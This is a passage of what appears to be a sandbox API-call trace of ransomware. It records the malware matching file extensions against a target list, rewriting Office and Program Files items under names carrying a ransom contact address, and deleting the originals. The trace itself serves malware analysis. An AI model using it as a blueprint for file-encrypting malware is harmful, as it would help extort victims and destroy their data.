(lpString1=".rar", lpString2=".txt") returned -1 [0057.949] lstrlenW (lpString=".bz2") returned 4 [0057.950] lstrcmpiW (lpString1=".bz2", lpString2=".txt") returned -1 [0057.950] lstrlenW (lpString=".7z") returned 3 [0057.950] lstrcmpiW (lpString1=".7z", lpString2="txt") returned -1 [0057.950] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 62 [0057.950] lstrlenW (lpString=".dbf") returned 4 [0057.950] lstrcmpiW (lpString1=".dbf", lpString2=".txt") returned -1 [0057.950] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 62 [0057.950] lstrlenW (lpString=".1cd") returned 4 [0057.950] lstrcmpiW (lpString1=".1cd", lpString2=".txt") returned -1 [0057.950] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 62 [0057.950] lstrlenW (lpString=".jpg") returned 4 [0057.950] lstrcmpiW (lpString1=".jpg", lpString2=".txt") returned -1 [0057.950] lstrcmpiW (lpString1=".VBS", lpString2=".bat") returned 1 [0057.950] lstrlenW (lpString="OSPP.VBS") returned 8 [0057.950] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.vbs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0057.959] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=94467) returned 1 [0057.959] CloseHandle (hObject=0x350) returned 1 [0057.959] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.vbs")) returned 0x20 [0057.959] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.vbs.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0057.960] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0057.960] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0057.960] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0057.960] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.vbs.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0057.962] GetLastError () returned 0x0 [0057.962] ReadFile (in: hFile=0x358, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x17103, lpOverlapped=0x0) returned 1 [0058.067] WriteFile (in: hFile=0x370, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x17110, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x17110, lpOverlapped=0x0) returned 1 [0058.069] ReadFile (in: hFile=0x358, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0058.069] WriteFile (in: hFile=0x370, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xe4, lpOverlapped=0x0) returned 1 [0058.069] SetEndOfFile (hFile=0x370) returned 1 [0058.069] CloseHandle (hObject=0x370) returned 1 [0058.071] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0058.071] SetEndOfFile (hFile=0x358) returned 1 [0058.072] CloseHandle (hObject=0x358) returned 1 [0058.072] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0058.073] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.vbs")) returned 1 [0058.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 51 [0058.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 51 [0058.073] lstrlenW (lpString=".doc") returned 4 [0058.073] lstrcmpiW (lpString1=".doc", lpString2=".VBS") returned -1 [0058.073] lstrlenW (lpString=".docx") returned 5 [0058.073] lstrcmpiW (lpString1=".docx", lpString2="P.VBS") returned -1 [0058.073] lstrlenW (lpString=".pdf") returned 4 [0058.073] lstrcmpiW (lpString1=".pdf", lpString2=".VBS") returned -1 [0058.073] lstrlenW (lpString=".xls") returned 4 [0058.073] lstrcmpiW (lpString1=".xls", lpString2=".VBS") returned 1 [0058.073] lstrlenW (lpString=".xlsx") returned 5 [0058.073] lstrcmpiW (lpString1=".xlsx", lpString2="P.VBS") returned -1 [0058.073] lstrlenW (lpString=".ppt") returned 4 [0058.073] lstrcmpiW (lpString1=".ppt", lpString2=".VBS") returned -1 [0058.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 51 [0058.073] lstrlenW (lpString=".zip") returned 4 [0058.073] lstrcmpiW (lpString1=".zip", lpString2=".VBS") returned 1 [0058.073] lstrlenW (lpString=".rar") returned 4 [0058.073] lstrcmpiW (lpString1=".rar", lpString2=".VBS") returned -1 [0058.073] lstrlenW (lpString=".bz2") returned 4 [0058.073] lstrcmpiW (lpString1=".bz2", lpString2=".VBS") returned -1 [0058.073] lstrlenW (lpString=".7z") returned 3 [0058.073] lstrcmpiW (lpString1=".7z", lpString2="VBS") returned -1 [0058.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 51 [0058.074] lstrlenW (lpString=".dbf") returned 4 [0058.074] lstrcmpiW (lpString1=".dbf", lpString2=".VBS") returned -1 [0058.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 51 [0058.074] lstrlenW (lpString=".1cd") returned 4 [0058.074] lstrcmpiW (lpString1=".1cd", lpString2=".VBS") returned -1 [0058.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 51 [0058.074] lstrlenW (lpString=".jpg") returned 4 [0058.074] lstrcmpiW (lpString1=".jpg", lpString2=".VBS") returned -1 [0058.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 51 [0058.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 51 [0058.074] lstrlenW (lpString=".doc") returned 4 [0058.074] lstrcmpiW (lpString1=".doc", lpString2=".VBS") returned -1 [0058.074] lstrlenW (lpString=".docx") returned 5 [0058.074] lstrcmpiW (lpString1=".docx", lpString2="P.VBS") returned -1 [0058.074] lstrlenW (lpString=".pdf") returned 4 [0058.074] lstrcmpiW (lpString1=".pdf", lpString2=".VBS") returned -1 [0058.074] lstrlenW (lpString=".xls") returned 4 [0058.074] lstrcmpiW (lpString1=".xls", lpString2=".VBS") returned 1 [0058.074] lstrlenW (lpString=".xlsx") returned 5 [0058.074] lstrcmpiW (lpString1=".xlsx", lpString2="P.VBS") returned -1 [0058.074] lstrlenW (lpString=".ppt") returned 4 [0058.074] lstrcmpiW (lpString1=".ppt", lpString2=".VBS") returned -1 [0058.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 51 [0058.074] lstrlenW (lpString=".zip") returned 4 [0058.074] lstrcmpiW (lpString1=".zip", lpString2=".VBS") returned 1 [0058.074] lstrlenW (lpString=".rar") returned 4 [0058.074] lstrcmpiW (lpString1=".rar", lpString2=".VBS") returned -1 [0058.074] lstrlenW (lpString=".bz2") returned 4 [0058.074] lstrcmpiW (lpString1=".bz2", lpString2=".VBS") returned -1 [0058.074] lstrlenW (lpString=".7z") returned 3 [0058.074] lstrcmpiW (lpString1=".7z", lpString2="VBS") returned -1 [0058.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 51 [0058.074] lstrlenW (lpString=".dbf") returned 4 [0058.074] lstrcmpiW (lpString1=".dbf", lpString2=".VBS") returned -1 [0058.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 51 [0058.074] lstrlenW (lpString=".1cd") returned 4 [0058.074] lstrcmpiW (lpString1=".1cd", lpString2=".VBS") returned -1 [0058.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS") returned 51 [0058.075] lstrlenW (lpString=".jpg") returned 4 [0058.075] lstrcmpiW (lpString1=".jpg", lpString2=".VBS") returned -1 [0058.075] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0058.075] lstrlenW (lpString="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 53 [0058.075] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0058.075] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=1533) returned 1 [0058.075] CloseHandle (hObject=0x358) returned 1 [0058.075] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0409-1000-0000000ff1ce.xml")) returned 0x220 [0058.075] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0058.075] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0058.075] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0058.075] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0058.075] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0058.076] GetLastError () returned 0x0 [0058.076] ReadFile (in: hFile=0x358, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x5fd, lpOverlapped=0x0) returned 1 [0058.077] WriteFile (in: hFile=0x370, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x600, lpOverlapped=0x0) returned 1 [0058.078] ReadFile (in: hFile=0x358, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0058.078] WriteFile (in: hFile=0x370, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x13e, lpOverlapped=0x0) returned 1 [0058.078] SetEndOfFile (hFile=0x370) returned 1 [0058.078] CloseHandle (hObject=0x370) returned 1 [0058.079] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0058.079] SetEndOfFile (hFile=0x358) returned 1 [0058.080] CloseHandle (hObject=0x358) returned 1 [0058.080] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0058.080] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0409-1000-0000000ff1ce.xml")) returned 1 [0058.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 104 [0058.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 104 [0058.081] lstrlenW (lpString=".doc") returned 4 [0058.081] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0058.081] lstrlenW (lpString=".docx") returned 5 [0058.081] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0058.081] lstrlenW (lpString=".pdf") returned 4 [0058.081] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0058.081] lstrlenW (lpString=".xls") returned 4 [0058.081] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0058.081] lstrlenW (lpString=".xlsx") returned 5 [0058.081] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0058.081] lstrlenW (lpString=".ppt") returned 4 [0058.081] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0058.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 104 [0058.081] lstrlenW (lpString=".zip") returned 4 [0058.081] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0058.081] lstrlenW (lpString=".rar") returned 4 [0058.081] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0058.081] lstrlenW (lpString=".bz2") returned 4 [0058.081] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0058.081] lstrlenW (lpString=".7z") returned 3 [0058.081] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0058.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 104 [0058.081] lstrlenW (lpString=".dbf") returned 4 [0058.081] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0058.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 104 [0058.081] lstrlenW (lpString=".1cd") returned 4 [0058.081] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0058.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 104 [0058.082] lstrlenW (lpString=".jpg") returned 4 [0058.082] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0058.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 104 [0058.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 104 [0058.082] lstrlenW (lpString=".doc") returned 4 [0058.082] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0058.082] lstrlenW (lpString=".docx") returned 5 [0058.082] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0058.082] lstrlenW (lpString=".pdf") returned 4 [0058.082] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0058.082] lstrlenW (lpString=".xls") returned 4 [0058.082] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0058.082] lstrlenW (lpString=".xlsx") returned 5 [0058.082] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0058.082] lstrlenW (lpString=".ppt") returned 4 [0058.082] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0058.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 104 [0058.082] lstrlenW (lpString=".zip") returned 4 [0058.082] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0058.082] lstrlenW (lpString=".rar") returned 4 [0058.082] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0058.082] lstrlenW (lpString=".bz2") returned 4 [0058.082] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0058.082] lstrlenW (lpString=".7z") returned 3 [0058.082] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0058.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 104 [0058.082] lstrlenW (lpString=".dbf") returned 4 [0058.082] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0058.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 104 [0058.082] lstrlenW (lpString=".1cd") returned 4 [0058.082] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0058.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 104 [0058.082] lstrlenW (lpString=".jpg") returned 4 [0058.082] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0058.083] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0058.083] lstrlenW (lpString="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 53 [0058.083] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0058.083] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=800867) returned 1 [0058.083] CloseHandle (hObject=0x358) returned 1 [0058.084] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0000-1000-0000000ff1ce.xml")) returned 0x220 [0058.084] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0000-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0058.084] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0058.084] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0058.084] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0058.084] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0000-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0058.084] GetLastError () returned 0x0 [0058.084] ReadFile (in: hFile=0x358, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xc3863, lpOverlapped=0x0) returned 1 [0058.254] WriteFile (in: hFile=0x370, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xc3870, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xc3870, lpOverlapped=0x0) returned 1 [0058.266] ReadFile (in: hFile=0x358, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0058.266] WriteFile (in: hFile=0x370, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x13e, lpOverlapped=0x0) returned 1 [0058.266] SetEndOfFile (hFile=0x370) returned 1 [0058.266] CloseHandle (hObject=0x370) returned 1 [0058.278] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0058.278] SetEndOfFile (hFile=0x358) returned 1 [0058.675] CloseHandle (hObject=0x358) returned 1 [0058.675] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0058.676] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0000-1000-0000000ff1ce.xml")) returned 1 [0058.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 104 [0058.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 104 [0058.676] lstrlenW (lpString=".doc") returned 4 [0058.676] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0058.676] lstrlenW (lpString=".docx") returned 5 [0058.676] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0058.676] lstrlenW (lpString=".pdf") returned 4 [0058.676] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0058.676] lstrlenW (lpString=".xls") returned 4 [0058.676] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0058.677] lstrlenW (lpString=".xlsx") returned 5 [0058.677] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0058.677] lstrlenW (lpString=".ppt") returned 4 [0058.677] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0058.677] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 104 [0058.677] lstrlenW (lpString=".zip") returned 4 [0058.677] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0058.677] lstrlenW (lpString=".rar") returned 4 [0058.677] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0058.677] lstrlenW (lpString=".bz2") returned 4 [0058.677] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0058.677] lstrlenW (lpString=".7z") returned 3 [0058.677] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0058.677] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 104 [0058.677] lstrlenW (lpString=".dbf") returned 4 [0058.677] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0058.677] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 104 [0058.677] lstrlenW (lpString=".1cd") returned 4 [0058.677] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0058.677] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 104 [0058.677] lstrlenW (lpString=".jpg") returned 4 [0058.677] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0058.677] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 104 [0058.677] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 104 [0058.677] lstrlenW (lpString=".doc") returned 4 [0058.677] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0058.677] lstrlenW (lpString=".docx") returned 5 [0058.677] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0058.678] lstrlenW (lpString=".pdf") returned 4 [0058.678] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0058.678] lstrlenW (lpString=".xls") returned 4 [0058.678] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0058.678] lstrlenW (lpString=".xlsx") returned 5 [0058.678] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0058.678] lstrlenW (lpString=".ppt") returned 4 [0058.678] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0058.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 104 [0058.678] lstrlenW (lpString=".zip") returned 4 [0058.678] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 